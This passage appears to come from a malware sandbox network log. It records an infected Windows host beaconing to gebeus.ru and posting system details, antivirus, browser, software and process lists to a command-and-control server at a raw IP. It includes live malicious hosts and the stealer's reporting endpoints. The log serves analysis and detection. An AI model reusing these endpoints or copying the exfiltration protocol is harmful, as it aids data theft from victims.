Jul 15, 2024 06:11:19.472368956 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49730	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:19.485044956 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hurkgkiufjdhatw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: gebeus.ru
Jul 15, 2024 06:11:19.485044956 CEST	244	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 66 09 c7 f2 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vufebi1AM%k$*\|?~=L^@?I;6?C7o^O2-'TL-?Au@A@3{:Wf?0$
Jul 15, 2024 06:11:20.972762108 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49731	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:12:30.891498089 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://twuefpujaurvfca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: gebeus.ru
Jul 15, 2024 06:12:30.891510963 CEST	122	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 4c bc 83 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuRLzO~Rn$X6WB@=
Jul 15, 2024 06:12:32.362530947 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:12:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49732	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:12:43.007643938 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ewsnnfxrccp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: gebeus.ru
Jul 15, 2024 06:12:43.007667065 CEST	163	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 0b fd b7 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu:J#v]~g.iFd_Z-+3,,H$HL33
Jul 15, 2024 06:12:44.551074982 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:12:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49733	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:12:49.310848951 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aeqbmojsaplkjy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: gebeus.ru
Jul 15, 2024 06:12:49.310873985 CEST	329	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 38 fa aa Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu$8j"mfgWy=O2ci+7+=8CKb_HI%i?-wVZ\|'e\t@q{p1Zai>P0
Jul 15, 2024 06:12:50.818428993 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:12:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49734	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:12:55.499866962 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qhngbjsxhdjts.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: gebeus.ru
Jul 15, 2024 06:12:55.499907970 CEST	163	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 1d c3 e7 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu;sEfBd%8O.;y;U@HDR[?A8'7$JKM$j
Jul 15, 2024 06:12:56.949840069 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:12:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49735	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:06.584767103 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vahxvallvgf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: gebeus.ru
Jul 15, 2024 06:13:06.584815979 CEST	251	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 52 af e5 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuKRDORrO%!WPI66oiq/jSLA)$Jh75L%ic[k<tCOB9e5hHE,R}0+;7;
Jul 15, 2024 06:13:07.645116091 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49736	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:09.391093016 CEST	177	OUT	POST /connect HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 61 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 76 65 72 73 69 6f 6e 3d 74 65 73 74 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&version=test
Jul 15, 2024 06:13:10.199902058 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=21bhg9uvofeeuc4v85rp4ieffc; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49737	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:12.333853006 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://evdyuckmovmlgw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: gebeus.ru
Jul 15, 2024 06:13:12.333868027 CEST	253	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1a d1 f7 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuR)}Jy9FL45-q*%6FjK1%dNF$AasNcY-hHV$7mf!M27NO)v\|{XsYL
Jul 15, 2024 06:13:13.393059969 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49738	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:12.388534069 CEST	432	OUT	POST /osinfo HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 316 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6f 73 3d 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 36 34 2d 62 69 74 26 6c 61 6e 67 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 26 6c 61 6e 67 73 3d 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3b 20 26 6e 61 6d 65 3d 68 61 72 64 7a 26 61 64 6d 69 6e 3d 46 61 6c 73 65 26 63 70 75 3d 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 34 20 43 6f 72 65 73 26 73 69 7a 65 78 3d 31 32 38 30 26 73 69 7a 65 79 3d 31 30 32 34 26 72 61 6d 3d 34 32 39 33 39 37 31 39 36 38 26 76 69 64 65 6f 3d 55 45 58 38 37 20 7c 20 52 41 4d 3a 20 31 30 37 33 37 34 31 38 32 34 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&os=Microsoft Windows 10 Pro 64-bit&lang=English (United Kingdom)&langs=English (United Kingdom); English (United Kingdom); &name=hardz&admin=False&cpu=Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 4 Cores&sizex=1280&sizey=1024&ram=4293971968&video=UEX87 \| RAM: 1073741824
Jul 15, 2024 06:13:13.112035036 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:13 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=3t96v9qi1m86cvr2bskg2o685d; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49739	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:13.348712921 CEST	190	OUT	POST /defenders HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 72 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Windows Defender
Jul 15, 2024 06:13:14.045598030 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:13 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=8v75nbprvlk54oh98gsoan7rhr; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49740	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:14.066075087 CEST	329	OUT	POST /browsers HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 211 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 7c 20 76 65 72 2e 20 31 31 38 2e 30 2e 31 2e 38 36 37 30 3b 0d 0a 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 3b 0d 0a 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 7c 20 76 65 72 2e 20 31 31 2e 30 2e 31 39 30 34 31 2e 31 35 36 36 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Mozilla Firefox \| ver. 118.0.1.8670;Google Chrome \| ver. 117.0.5938.132;Internet Explorer \| ver. 11.0.19041.1566;Microsoft Edge \| ver. 117.0.2045.47;
Jul 15, 2024 06:13:14.759726048 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:14 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=kmg0m9qeag3sj77he9aaq9hg53; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49741	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:14.779076099 CEST	422	OUT	POST /softwares HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 303 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 55 70 64 61 74 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 57 65 62 56 69 65 77 32 20 52 75 6e 74 69 6d 65 3b 0d 0a 4a 61 76 61 20 41 75 74 6f 20 55 70 64 61 74 65 72 3b 0d 0a 4a 61 76 61 20 38 20 55 70 64 61 74 65 20 33 38 31 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 32 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 34 2e 33 36 2e 33 32 35 33 32 3b 0d 0a 4f 66 66 69 63 65 20 31 36 20 43 6c 69 63 6b 2d 74 6f 2d 52 75 6e 20 45 78 74 65 6e 73 69 62 69 6c 69 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Google Chrome;Microsoft Edge;Microsoft Edge Update;Microsoft Edge WebView2 Runtime;Java Auto Updater;Java 8 Update 381;Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532;Office 16 Click-to-Run Extensibility Component;
Jul 15, 2024 06:13:15.497977972 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:15 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=93prlsesgtg62st7u965f5uiok; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49742	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:17.760041952 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yxdvfnljluug.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: gebeus.ru
Jul 15, 2024 06:13:17.760086060 CEST	253	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 42 b1 9d Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuxBxAatr23d=lvMvjZ\|911y ,(J<>f`F)Xl$*OY9di7giSbG=z2+
Jul 15, 2024 06:13:19.037774086 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49743	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:23.074628115 CEST	12360	OUT	POST /proccesses HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 24746 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 70 72 6f 63 65 73 73 65 73 3d 49 44 3a 20 30 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 2c 20 4e 61 6d 65 3a 20 53 79 73 74 65 6d 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 39 32 2c 20 4e 61 6d 65 3a 20 52 65 67 69 73 74 72 79 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 33 33 32 2c 20 4e 61 6d 65 3a 20 73 6d 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 32 30 2c 20 4e 61 6d 65 3a 20 63 73 72 73 73 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d 0a 49 44 3a 20 34 39 36 2c 20 4e 61 6d 65 3a 20 77 69 6e 69 6e 69 74 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 4e 55 4c 4c 0d [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>processes=ID: 0, Name: System Idle Process, CommandLine: NULLID: 4, Name: System, CommandLine: NULLID: 92, Name: Registry, CommandLine: NULLID: 332, Name: smss.exe, CommandLine: NULLID: 420, Name: csrss.exe, CommandLine: NULLID: 496, Name: wininit.exe, CommandLine: NULLID: 504, Name: csrss.exe, CommandLine: NULLID: 564, Name: winlogon.exe, CommandLine: NULLID: 632, Name: services.exe, CommandLine: NULLID: 640, Name: lsass.exe, CommandLine: NULLID: 752, Name: svchost.exe, CommandLine: NULLID: 780, Name: fontdrvhost.exe, CommandLine: NULLID: 788, Name: fontdrvhost.exe, CommandLine: NULLID: 872, Name: svchost.exe, CommandLine: NULLID: 924, Name: svchost.exe, CommandLine: NULLID: 992, Name: dwm.exe, CommandLine: NULLID: 444, Name: svchost.exe, CommandLine: NULLID: 732, Name: svchost.exe, CommandLine: NULLID: 280, Name: svchost.exe, CommandLine: NULLID: 1032, Name: svchost.exe, CommandLine: NULLID: 1056, Na [TRUNCATED]
